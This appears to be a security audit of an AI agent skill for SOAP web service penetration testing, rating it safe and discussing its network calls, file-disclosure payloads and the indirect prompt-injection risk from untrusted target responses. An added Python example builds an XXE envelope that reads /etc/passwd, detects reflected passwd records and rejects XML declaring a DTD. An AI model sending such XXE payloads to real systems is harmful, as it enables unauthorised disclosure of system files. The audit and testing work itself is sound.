skills/mukul975/anthropic-cybersecurity-skills/performing-soap-web-service-security-testing/Gen Agent Trust Hub
performing-soap-web-service-security-testing
Pass
Audited by Gen Agent Trust Hub on Apr 7, 2026
Risk Level: SAFE
Full Analysis
- [SAFE]: The skill is a specialized tool for cybersecurity penetration testing. Its implementations of common vulnerability test cases (e.g., XXE, SQLi) are transparently documented and align with industry-standard testing methodologies.
- [EXTERNAL_DOWNLOADS]: The skill uses the Python 'requests' library to fetch WSDL definitions and interact with SOAP endpoints. These network operations are controlled by user-provided parameters (URL/endpoint) and are necessary for the skill's intended function.
- [DATA_EXFILTRATION]: The code includes payloads designed to test for file disclosure (e.g., 'file:///etc/passwd' in XXE tests). These payloads are sent only to the target endpoint the user specifies and serve to validate a vulnerability in that target; the skill does not exfiltrate the user's own data to a remote server.
- [PROMPT_INJECTION]: As a security testing utility, the skill processes external WSDL data and SOAP responses, which are untrusted inputs. This is a surface for indirect prompt injection, but the data is consumed programmatically by the testing logic and is not used to influence the agent's core behavioral instructions. Any portion of a response that the agent later summarizes into its context should still be treated as untrusted text.
- Ingestion points: 'requests.get' for WSDL files and 'requests.post' for service responses in 'scripts/agent.py'.
- Boundary markers: None explicitly defined to separate untrusted data from the agent context.
- Capability inventory: Network operations via 'requests' to perform SOAP calls.
- Sanitization: No specific sanitization or validation of the remote XML structure beyond standard parsing with 'lxml'. A hostile target can therefore return XML that carries a DTD aimed at the testing tool's own parser rather than at the service under test.
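Added illustration for this audit (not code from the skill's 'scripts/agent.py' or from the auditor): the shape of the XXE test case the analysis describes, a check for reflected '/etc/passwd' content, and the guard the sanitization note finds missing, namely refusing to parse any remote XML that declares a DTD. The operation and parameter names, the namespace, and the sample responses are constructed for the example; a real test takes them from the target's WSDL.

```python
"""XXE probe construction, disclosure detection and a DTD-rejecting parser.
Added example; operation/parameter names, namespace and responses are assumed."""
import re
import xml.etree.ElementTree as ET

# External entity pointing at a local file on the target; the entity is
# referenced from inside the SOAP body so a vulnerable parser reflects the
# file content in its response.
XXE_ENTITY_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE soap [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
)


def build_xxe_envelope(operation: str, param: str,
                       ns: str = "http://example.invalid/svc") -> str:
    """Build a SOAP 1.1 envelope whose parameter value is the external entity.
    `operation`, `param` and `ns` are placeholders (assumed names)."""
    return (
        XXE_ENTITY_PAYLOAD
        + '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        + '<soap:Body>'
        + f'<t:{operation} xmlns:t="{ns}"><t:{param}>&xxe;</t:{param}></t:{operation}>'
        + '</soap:Body></soap:Envelope>'
    )


# Evidence that /etc/passwd was reflected: a "name:pw:uid:gid:" record that is
# not glued to a preceding character (so "soap:Client" or a URL never matches).
PASSWD_RECORD = re.compile(r"(?<![^>\s])[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:")


def response_indicates_file_disclosure(body: str) -> bool:
    """True when a SOAP response body contains passwd-style records."""
    return PASSWD_RECORD.search(body) is not None


DTD_MARKER = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML received from a target (WSDL or SOAP response) while refusing
    any DTD. No legitimate WSDL or SOAP message needs one, so failing closed
    removes the entity-expansion tricks (XXE, billion laughs) a hostile target
    could aim back at the tester. A DOCTYPE inside a comment or CDATA is also
    rejected; that is a false positive we accept."""
    if DTD_MARKER.search(data):
        raise ValueError("refusing to parse XML that declares a DTD or entities")
    return ET.fromstring(data)


# Constructed sample responses; not captured from any real service.
VULNERABLE_RESPONSE = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><t:LookupResponse xmlns:t="http://example.invalid/svc">
    <t:result>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
</t:result></t:LookupResponse></soap:Body></soap:Envelope>"""

SAFE_RESPONSE = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><soap:Fault><faultcode>soap:Client</faultcode>
  <faultstring>Entity 'xxe' not defined; root cause unknown</faultstring>
  </soap:Fault></soap:Body></soap:Envelope>"""

# A response a hostile target might return to attack the tester's own parser.
HOSTILE_RESPONSE = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY e SYSTEM '
                    b'"file:///etc/hostname">]><r>&e;</r>')


if __name__ == "__main__":
    print(build_xxe_envelope("Lookup", "id"))
    print("vulnerable:", response_indicates_file_disclosure(VULNERABLE_RESPONSE))
    print("safe:", response_indicates_file_disclosure(SAFE_RESPONSE))
    try:
        parse_untrusted_xml(HOSTILE_RESPONSE)
    except ValueError as exc:
        print("rejected:", exc)
```

The detector matches the structure of a passwd record rather than the word "root", so a SOAP fault that merely mentions "root cause" is not reported as a finding; the DTD guard is the same fail-closed rule that defusedxml applies with its forbid_dtd option, implemented here as a byte scan so it works in front of any parser.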
Audit Metadata